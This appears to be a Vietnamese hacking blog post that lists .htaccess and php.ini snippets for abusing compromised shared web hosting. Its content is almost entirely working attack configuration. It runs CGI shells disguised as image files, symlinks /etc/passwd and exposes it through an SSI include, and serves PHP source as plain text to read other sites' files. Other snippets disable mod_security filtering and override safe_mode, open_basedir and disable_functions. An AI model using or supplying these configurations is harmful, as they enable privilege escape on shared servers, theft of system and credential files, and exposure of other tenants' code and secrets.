Trang

.htaccess ( đa chức năng )

Sử dụng tùy trường hợp

cgitelnet symlink htaccess

symljnk ghi vào file.hack
download file.hack về

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*).mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack


SSI VIEW SYMLJNK
.htaccess

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /etc/passwd tyn.txt

tyn.shtml:

<!--#include virtual="tyn.txt" -->

direct symljnk view file.php dưới dạng file text

options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php



Safe mod off

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

or

Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

php.ini:

safe_mode=Off
Disable_Functions=None
Open_Basedir=None
Safe_Exec_Dir=None
Safe_Gid=None
Safe_Include_Dir=None
Sql.safe_mode=None
cURL=Off
MySQL=Off
MSSQL=Off
PostgreSQL=Off
Oracle=Off

or

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterSanPOST Off
</IfModule>
#START #
Options +ExecCGI
AddHandler cgi-script cgi pl tmt

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

VIEW file.php

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

hạ safe_mode
php.ini

safe_mode = Off
disable_functions = ""

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>

.htaccess

AddHandler application/x-httpd-php4 .php .php4 .php3

.htaccess

php_flag safe_mode off
php_flag disable_functions ""

.htaccess

php_admin_value disable_functions ""
php_admin_value safe_mode off

.htaccess

php_value safe_mode off
php_value disable_functions ""

.htaccess

SetEnv PHPRC /home/user/public_html/php.ini

.htaccess

suPHP_ConfigPath /home/user/public_html/php.ini

.htaccess

<Files *.php>
ForceType application/x-httpd-php4
</Files>

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương